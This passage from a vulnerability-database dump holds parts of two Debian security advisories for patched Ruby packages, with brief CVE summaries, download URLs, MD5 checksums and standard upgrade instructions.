6cc76b78245992c6a68b9e078ae89d53\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_hppa.deb\n Size/MD5 checksum: 199900 d70a4e3bc2ced6217727543e7fe0f9b0\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_hppa.deb\n Size/MD5 checksum: 316214 4e6641aa45421ffab8b99ab8a9e8d16a\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_hppa.deb\n Size/MD5 checksum: 217620 85109a63b0b20068f6320cda8f3ec6ad\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_hppa.deb\n Size/MD5 checksum: 237090 
a3d1415f5a1ad8238d56b050975189e9\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_hppa.deb\n Size/MD5 checksum: 200304 783f82fe9eac7aa259a35479cc2a47e7\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_hppa.deb\n Size/MD5 checksum: 1880858 9ab71d7b85b97c1f2d2aa3500b9ce7c1\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_hppa.deb\n Size/MD5 checksum: 1040322 02afc219d2b174b059881ec0a83356fc\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_hppa.deb\n Size/MD5 checksum: 1861536 432efb1fffc5c2b1d9cc7b74ae7baa39\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_hppa.deb\n Size/MD5 checksum: 199202 84de055812481012c4876c17833ce3b0\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_hppa.deb\n Size/MD5 checksum: 1869258 834f2dbf84ab6697d7980d3658290cfd\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_hppa.deb\n Size/MD5 checksum: 219214 801a3641d72145d568a6c0c88ef43bd8\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_hppa.deb\n Size/MD5 checksum: 888950 464ded03bf97abbc0d417b089fa87d60\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_hppa.deb\n Size/MD5 checksum: 217980 2535726a60b609b1a55fc310328df532\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_hppa.deb\n Size/MD5 checksum: 1677084 d5b606c636b8cd27143ce002d0ed2ce9\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_hppa.deb\n Size/MD5 checksum: 333772 38a4c8fef89fde902a0be85e59fe8a8f\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_i386.deb\n Size/MD5 checksum: 197974 e282a6d8268ef83c156a860fb8a16a7c\n 
http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_i386.deb\n Size/MD5 checksum: 216404 82cf3992d705f2e9b88a915e352ca934\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_i386.deb\n Size/MD5 checksum: 1530904 7f21db178c88933c5e077890402de73f\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_i386.deb\n Size/MD5 checksum: 1752738 3291630941e3dbb88efb8a97f33c208b\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_i386.deb\n Size/MD5 checksum: 217116 6d9fbeeb9354b35e033f036109c3187c\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_i386.deb\n Size/MD5 checksum: 216638 513608a225ce87330453e9b1bd910f34\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_i386.deb\n Size/MD5 checksum: 1001838 64e08e52fac509f2bcdec25fed6fdc07\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_i386.deb\n Size/MD5 checksum: 719438 d568135366f021f1511e186201475268\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_i386.deb\n Size/MD5 checksum: 197348 8fec8e658d39d42c2857475ef279f08d\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_i386.deb\n Size/MD5 checksum: 290114 69d7bdf1893fe305a003fbcaf264c9e4\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_i386.deb\n Size/MD5 checksum: 1821730 a79338c8bfea54d6c6e78f85fb0aaa4d\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_i386.deb\n Size/MD5 checksum: 1867788 9258d6168a057238d5dd1ead02513e74\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_i386.deb\n Size/MD5 checksum: 758004 40c77b36b3a2b061db9c16b4a01f4391\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_i386.deb\n 
Size/MD5 checksum: 237546 2e1c1a544086d57780f3ae4bb02da9c0\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_i386.deb\n Size/MD5 checksum: 345762 cb32b33017f36b17cc06cc8ed90414b9\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_i386.deb\n Size/MD5 checksum: 309632 3202e1f7f3c9eb0b6062148b9af7e788\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_i386.deb\n Size/MD5 checksum: 215662 1cd102a588e1082716a0858dbc5891d0\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_i386.deb\n Size/MD5 checksum: 197442 c38974894410e79acf7931fc0e8dad54\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_ia64.deb\n Size/MD5 checksum: 330612 0887a43e2d62199cc73660039d7f1919\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_ia64.deb\n Size/MD5 checksum: 351174 1bb59b9997961359cb20c9fb6945a0f0\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_ia64.deb\n Size/MD5 checksum: 351444 5918b0c479ee79cc7466484c76e6dd98\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_ia64.deb\n Size/MD5 checksum: 2225792 c780194abaeac68b844bc6fcd411376d\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_ia64.deb\n Size/MD5 checksum: 971834 e280240763deda9e120b41faf64b47e2\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_ia64.deb\n Size/MD5 checksum: 203432 7430326aeac7519e33b7ca34a77c1779\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_ia64.deb\n Size/MD5 checksum: 220188 1b368e296ab170d1e005f600cada244f\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_ia64.deb\n Size/MD5 
checksum: 1864142 76176efd4132f6dd862946935368e2d6\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_ia64.deb\n Size/MD5 checksum: 218646 4c1088b7f7002d3223ca0a33e27eaa0e\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_ia64.deb\n Size/MD5 checksum: 1095818 64f6c9fd95b4c6af5cdfade1b958e9c8\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_ia64.deb\n Size/MD5 checksum: 236376 d8ffa9e36d27c315bf12543035067d4b\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_ia64.deb\n Size/MD5 checksum: 220668 62f25d6880a721afac92d5fbd08ee714\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_ia64.deb\n Size/MD5 checksum: 202476 a5d3f5c7b7c963ecd5ab916315deb460\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_ia64.deb\n Size/MD5 checksum: 1024524 c406606563dae3bf9ad255a4c0c8344f\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_ia64.deb\n Size/MD5 checksum: 1895844 ea86b262fda8dc1dee04a1348abffbca\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_ia64.deb\n Size/MD5 checksum: 201506 22ba7b847e836fd960b0cb53358c106b\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_ia64.deb\n Size/MD5 checksum: 220662 6f066d4dbe40ba488e1ae2e883dc6262\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_ia64.deb\n Size/MD5 checksum: 1861880 e3b9fcda55d44a6b921140fc49cdbecc\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_mips.deb\n Size/MD5 checksum: 215262 4d2fe03f92af44b8362661b562b21754\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_mips.deb\n Size/MD5 checksum: 1084552 2d2dac8ed50123fdb90d733e9cf9b855\n 
http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_mips.deb\n Size/MD5 checksum: 1862110 3b49c520a4ce20c6d6fcc11319a182e1\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_mips.deb\n Size/MD5 checksum: 1680280 bf7a624e97e372c4bbfc2fe769ff8974\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_mips.deb\n Size/MD5 checksum: 197456 8c980f163be8105285609fdd454e1977\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_mips.deb\n Size/MD5 checksum: 236198 81b996367fc453a8ceb3a531501253de\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_mips.deb\n Size/MD5 checksum: 301628 bb1dc6aa3461335e4a9b419cd267ee65\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_mips.deb\n Size/MD5 checksum: 874228 a5cc44dbd1cc80f8eef1a159ab3189f3\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_mips.deb\n Size/MD5 checksum: 216100 f2360af30afc204b9226bf5cc0863853\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_mips.deb\n Size/MD5 checksum: 197594 fca3406a3b55cfdc69c8989b072ca031\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_mips.deb\n Size/MD5 checksum: 802420 6699c1bd4709051c910fc0bfe68c9b37\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_mips.deb\n Size/MD5 checksum: 215980 2d9003c25275e1fd5ee6c53d959344f7\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_mips.deb\n Size/MD5 checksum: 281536 fe8d5b309e7ab0be35e721e6b3ac97dd\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_mips.deb\n Size/MD5 checksum: 217990 f096260bda09b34a2c2f8cf018c80ae1\n 
http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_mips.deb\n Size/MD5 checksum: 1850962 60c4d783bcb2d0f852aa38fac3cad1d5\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_mips.deb\n Size/MD5 checksum: 196670 16d12b430464de86499d897c2a28b213\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_mips.deb\n Size/MD5 checksum: 1540332 5b40f3e2137e7753b54b3202a02f2fa9\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_mips.deb\n Size/MD5 checksum: 372286 2a9d8fc201caad40ceefb3cbd2a61d12\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_mipsel.deb\n Size/MD5 checksum: 218178 0298e98b39cbf08fa18d4fe0d617df41\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb\n Size/MD5 checksum: 215442 2c78e52c5e2a619a0d3b436c1a887a53\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_mipsel.deb\n Size/MD5 checksum: 1538434 b88e43e5cec1aacf83a598dab477c3ab\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_mipsel.deb\n Size/MD5 checksum: 1667992 01b49904e244952345158c4e22006a42\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb\n Size/MD5 checksum: 299462 1e7905d97c9ec5f2dffdd8dd22b48002\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_mipsel.deb\n Size/MD5 checksum: 279298 5823c4a9baf7975c73eb6d36047dfed4\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_mipsel.deb\n Size/MD5 checksum: 1059442 dba878a9064478b59f1548cf661041f7\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_mipsel.deb\n Size/MD5 checksum: 793388 f945925d054d92aba8ca6f7e46a685ee\n 
http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb\n Size/MD5 checksum: 216340 c676c1ea64ad2b41ee571249b99568d9\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_mipsel.deb\n Size/MD5 checksum: 197742 9dfdbf8675ab4a56dfbfdeaa7bb6f733\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb\n Size/MD5 checksum: 216192 3ec8e74d7b723d246719dd9227862c8a\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_mipsel.deb\n Size/MD5 checksum: 367552 b0a7a4121cca96fc576497e5eeb7d664\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_mipsel.deb\n Size/MD5 checksum: 858608 9f415ec47bba07a78331e26e35300a5b\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_mipsel.deb\n Size/MD5 checksum: 1837532 6face0d7dcc576c00e564c66d5e78d42\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_mipsel.deb\n Size/MD5 checksum: 198096 80b334507f4cbfc62b2a439e5d6f3f2e\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_mipsel.deb\n Size/MD5 checksum: 235700 826646ac1e00564ab805d15ac64659bd\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_mipsel.deb\n Size/MD5 checksum: 197150 b5c725b9fe159d6b3ddb9a1d607d5516\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_mipsel.deb\n Size/MD5 checksum: 1830428 4123d91e58c7e5f0c4a784d5087f929e\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb\n Size/MD5 checksum: 218314 45b937607b0c710f9651a88e3c77734a\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_powerpc.deb\n Size/MD5 checksum: 1808952 
c905cd43d26918def2c2110b0d0787b8\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb\n Size/MD5 checksum: 1844840 4698433b87fa56b6f7c8cf581f9ad4c0\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_powerpc.deb\n Size/MD5 checksum: 777146 a01b49460afc4733cff7d1da5c3892ca\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_powerpc.deb\n Size/MD5 checksum: 219458 02100fb307634e08fd304f830fa73115\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_powerpc.deb\n Size/MD5 checksum: 372960 2e69a084e4ecc663d54a885b69cd4d87\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_powerpc.deb\n Size/MD5 checksum: 199768 14727fe59c8a774dc0ce5283bbe3adf4\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb\n Size/MD5 checksum: 218562 6ef5bfa416e85714847e7911ad15b7bc\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_powerpc.deb\n Size/MD5 checksum: 294044 404be1b8ba5d7b1de693949bf7509c50\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_powerpc.deb\n Size/MD5 checksum: 237306 abd5d03c1a8c5e730fbbb3b7cbfc13a3\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb\n Size/MD5 checksum: 217678 56fc7c04ec11e80b958592b53698f2cb\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_powerpc.deb\n Size/MD5 checksum: 312482 489f3cd6e21ef98d9b3d4031313e0ff8\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_powerpc.deb\n Size/MD5 checksum: 199536 1a549205c85f26df75918ee1f5c5a5e6\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_powerpc.deb\n Size/MD5 checksum: 1107170 e3be222facad68b2ea2c1d743bfe7729\n 
http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_powerpc.deb\n Size/MD5 checksum: 200076 a9030c3b873cf7feca45d7fb18b2c1c5\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_powerpc.deb\n Size/MD5 checksum: 1837356 f519218b7727c4c0064d87052a32cd57\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_powerpc.deb\n Size/MD5 checksum: 719018 ff1d0ace8eeec5d602e0cc94c3b834ae\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_powerpc.deb\n Size/MD5 checksum: 1592732 37cfd2a2da9ab0c297cd3e3e2d44d9b0\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_s390.deb\n Size/MD5 checksum: 327762 27db76dd87740f49cf998c08d7ab567c\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_s390.deb\n Size/MD5 checksum: 1855938 622f315ff7c5c3e488b364102dff54bd\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_s390.deb\n Size/MD5 checksum: 217518 c56bb0699f151595c7cea6cc0d002476\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_s390.deb\n Size/MD5 checksum: 217572 74f4d455673a8cedbbd19f03cd1a68bf\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_s390.deb\n Size/MD5 checksum: 779594 1da6fea9a757a6147bccd1be029efc77\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_s390.deb\n Size/MD5 checksum: 884422 dd7a11cbdee41fc9efbfeb616236c261\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_s390.deb\n Size/MD5 checksum: 1849714 09fcada1e82f4f89b7cff7bb556ac055\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_s390.deb\n Size/MD5 checksum: 235540 3431f6c302e74a70f0e31b13ee703c19\n 
http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_s390.deb\n Size/MD5 checksum: 1052398 95816bfd6638c6c6cf7c8c91f8a5a6df\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_s390.deb\n Size/MD5 checksum: 305308 1123e31b1920e3e7f1ac216eddaaba37\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_s390.deb\n Size/MD5 checksum: 1838936 4accc47fcb960eaa9b04a6ff450c678b\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_s390.deb\n Size/MD5 checksum: 218044 d92f877014b653c14260db06cfa0844e\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_s390.deb\n Size/MD5 checksum: 199000 3c6e11cc181a6593505e20279d310a03\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_s390.deb\n Size/MD5 checksum: 198678 9b90584a77a43162a15087943f9596be\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_s390.deb\n Size/MD5 checksum: 199480 65c1e5b6224a9a5ed5f1afe4053e9e97\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_s390.deb\n Size/MD5 checksum: 218054 147f93ceaf0c8119ca264957ffc7c51a\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_s390.deb\n Size/MD5 checksum: 371520 61de55d36d7fadd6f885a4021bebc229\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_s390.deb\n Size/MD5 checksum: 1620382 7a7339edea525e5d5bc6f8c794a8c3e7\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_sparc.deb\n Size/MD5 checksum: 197218 5ddc1259eef42b0c05439cb8ab731942\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_sparc.deb\n Size/MD5 checksum: 197994 3ab96c368edc3bce77e73b529c4c5b84\n 
http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_sparc.deb\n Size/MD5 checksum: 1833286 c7f9f992093cacfb766259e889de13ba\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_sparc.deb\n Size/MD5 checksum: 960816 c43630f6bbb40fb21fffdc0ad516ddfe\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_sparc.deb\n Size/MD5 checksum: 197944 2d534c9e73f36b3b75e01f2f20bfb6c6\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_sparc.deb\n Size/MD5 checksum: 296102 c192762dbeaf435d11e51448565bc9b1\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_sparc.deb\n Size/MD5 checksum: 741330 59352ae48a97d10d96d23f84f8e3d4d7\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_sparc.deb\n Size/MD5 checksum: 1543188 313ab5a0048823ce919bf50a1b3f1de9\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_sparc.deb\n Size/MD5 checksum: 217960 208c79695f22f705f70ecce79efa87b4\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "modified": "2009-01-02T21:47:38", "published": "2009-01-02T21:47:38", "id": "DEBIAN:DSA-1695-1:CB9A2", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00001.html", "title": "[SECURITY] [DSA 1695-1] New Ruby packages fix denial of service", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-30T02:22:03", "bulletinFamily": "unix", "description": 
"- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1651-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nOctober 12, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : ruby1.8\nVulnerability : several\nProblem-Type : local(remote)\nDebian-specific: no\nCVE ID : CVE-2008-3655 CVE-2008-3656 CVE-2008-3657 CVE-2008-3790 CVE-2008-3905\n\nSeveral vulnerabilities have been discovered in the interpreter for\nthe Ruby language, which may lead to denial of service and other\nsecurity problems. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2008-3655\n\n Keita Yamaguchi discovered that several safe level restrictions\n are insufficiently enforced.\n \nCVE-2008-3656\n\n Christian Neukirchen discovered that the WebRick module uses\n inefficient algorithms for HTTP header splitting, resulting in\n denial of service through resource exhaustion.\n\nCVE-2008-3657\n\n It was discovered that the dl module doesn't perform taintness\n checks.\n\nCVE-2008-3790\n\n Luka Treiber and Mitja Kolsek discovered that recursively nested\n XML entities can lead to denial of service through resource\n exhaustion in rexml.\n\nCVE-2008-3905\n\n Tanaka Akira discovered that the resolv module uses sequential\n transaction IDs and a fixed source port for DNS queries, which\n makes it more vulnerable to DNS spoofing attacks.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 1.8.5-4etch3. 
Packages for arm will be provided later.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 1.8.7.72-1.\n\nWe recommend that you upgrade your ruby1.8 packages.\n\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5.orig.tar.gz\n Size/MD5 checksum: 4434227 aae9676332fcdd52f66c3d99b289878f\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3.dsc\n Size/MD5 checksum: 1079 4c7df61bd710db620b87ae0a3b98d388\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch3.diff.gz\n Size/MD5 checksum: 142603 f7c9366a3e04f00f5d4e7deb5d27eaf9\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/ri1.8_1.8.5-4etch3_all.deb\n Size/MD5 checksum: 1241006 d8312745f5bf656d950323c6c9761e1e\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-elisp_1.8.5-4etch3_all.deb\n Size/MD5 checksum: 211002 1b5eefc0ee08f8224b14e9cc887c408e\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-examples_1.8.5-4etch3_all.deb\n Size/MD5 checksum: 245020 e16a6c9adf8603359b5031e46185bf25\n http://security.debian.org/pool/updates/main/r/ruby1.8/irb1.8_1.8.5-4etch3_all.deb\n Size/MD5 checksum: 235612 69142939deabd04310455bb13f288c66\n 
